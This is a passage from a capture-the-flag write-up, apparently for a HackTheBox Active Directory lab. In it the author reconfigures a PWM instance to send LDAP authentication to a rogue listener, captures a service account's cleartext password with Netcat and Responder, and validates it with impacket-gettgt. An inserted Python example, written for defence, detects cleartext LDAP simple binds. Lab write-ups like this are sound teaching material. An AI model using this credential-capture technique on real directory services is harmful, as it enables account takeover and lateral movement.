PWM


Using the cracked password, I am able to authenticate to the PWM instance running on the web server.

Configuration Manager


While there’s a lot to go through in the Configuration Manager, it appears that the PWM instance is not connected to the LDAPS server, authority.authority.htb:636. I am also able to download the current configuration for review, as well as download the DB.

Configuration


┌──(kali㉿kali)-[~/…/htb/labs/authority/pwm]
└─$ file PwmConfiguration.xml 
pwmconfiguration.xml: XML 1.0 document, Unicode text, UTF-8 text, with CRLF, CR, LF line terminators
 
┌──(kali㉿kali)-[~/…/htb/labs/authority/pwm]
└─$ ll PwmConfiguration.xml 
132k -rw-r--r-- 1 kali kali 132k jul 17 18:35 PwmConfiguration.xml

The downloaded configuration file is a large XML document.

There is a hash string, but I was unable to crack it.

LocalDB


The LocalDB button loads a page showing the loaded DB instance at c:\pwm\LocalDB. I am also able to download that. I failed to review the DB file as it is a Java file requiring a JDBC driver.

Configuration Editor


There is also a Configuration Editor.

Here, I am able to modify the configuration settings. Notice there is an attribute, LDAP Proxy Password, with its value stored but not shown.

Intercepting LDAP Authentication


But I might be able to change the LDAP URLs attribute.

I will append an arbitrary LDAP server running on Kali.

testing

The local Netcat listener picked up the LDAP authentication packet from the web app. It contains the CLEARTEXT password for the svc_ldap account: lDaP_1n_th3_cle4r!

┌──(kali㉿kali)-[~/…/smb/Development/Automation/ansible_hash]
└─$ sudo responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|
 
           NBT-NS, LLMNR & MDNS Responder 3.1.3.0
 
[...REDACTED...]
 
[+] Servers:
 
    LDAP server                [ON]
 
[...REDACTED...]
 
[+] Listening for events...
 
[LDAP] Cleartext Client   : 10.10.11.222
[LDAP] Cleartext Username : CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb
[LDAP] Cleartext Password : lDaP_1n_th3_cle4r!
[+] Exiting...

It also works with Responder.
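The password is readable because an LDAP simple bind (RFC 4511) carries it as a plain octet string inside the BindRequest, so without TLS any server the client is pointed at receives it as-is. The following added example (not part of the original writeup) decodes a BindRequest and flags simple binds, as a network detection would; the DN and password in the samples are constructed placeholders, and the function names are hypothetical.

```python
def tlv(tag, value):
    """Encode a short-form BER element (only builds the constructed samples)."""
    return bytes([tag, len(value)]) + value

def read_tlv(buf, pos):
    """Decode one BER element at pos; return (tag, value, next_pos)."""
    if pos + 2 > len(buf):
        raise ValueError("truncated BER header")
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:  # long form: low 7 bits count the length octets
        size = length & 0x7F
        if size == 0 or pos + size > len(buf):
            raise ValueError("indefinite or truncated BER length")
        length = int.from_bytes(buf[pos:pos + size], "big")
        pos += size
    if pos + length > len(buf):
        raise ValueError("truncated BER value")
    return tag, buf[pos:pos + length], pos + length

def inspect_bind(packet):
    """Return bind details, or None when the message is not a BindRequest."""
    tag, message, _ = read_tlv(packet, 0)      # LDAPMessage SEQUENCE
    if tag != 0x30:
        return None
    id_tag, _, pos = read_tlv(message, 0)      # messageID INTEGER
    op_tag, op, _ = read_tlv(message, pos)     # protocolOp
    if id_tag != 0x02 or op_tag != 0x60:       # 0x60 = BindRequest
        return None
    _, _, pos = read_tlv(op, 0)                # version INTEGER
    _, name, pos = read_tlv(op, pos)           # bind DN (OCTET STRING)
    auth_tag, auth, _ = read_tlv(op, pos)      # 0x80 = simple, 0xA3 = SASL
    simple = auth_tag == 0x80
    return {
        "dn": name.decode("utf-8", "replace"),
        "mechanism": "simple" if simple else "sasl",
        # Report only the length so the detector never logs the secret itself.
        "cleartext_password": simple and len(auth) > 0,
        "secret_length": len(auth) if simple else 0,
    }

# Constructed samples: placeholder DN and password, not values from the lab.
SAMPLE_DN = "CN=svc_example,OU=Service Accounts,DC=example,DC=test"
def bind(auth):
    op = tlv(0x02, b"\x03") + tlv(0x04, SAMPLE_DN.encode()) + auth
    return tlv(0x30, tlv(0x02, b"\x01") + tlv(0x60, op))

SIMPLE_BIND = bind(tlv(0x80, b"Constructed-Passw0rd"))
SASL_BIND = bind(tlv(0xA3, tlv(0x04, b"GSSAPI")))
```

A simple bind with an empty password (anonymous bind) is reported with `cleartext_password` set to `False`, since no secret crosses the wire in that case.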

Validation


┌──(kali㉿kali)-[~/archive/htb/labs/authority]
└─$ impacket-gettgt 'authority.htb/svc_ldap:lDaP_1n_th3_cle4r!' -dc-ip $IP
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
 
[*] Saving ticket in svc_ldap.ccache

Credential validated. TGT generated for better OPSEC with the pass_the_ticket attack technique.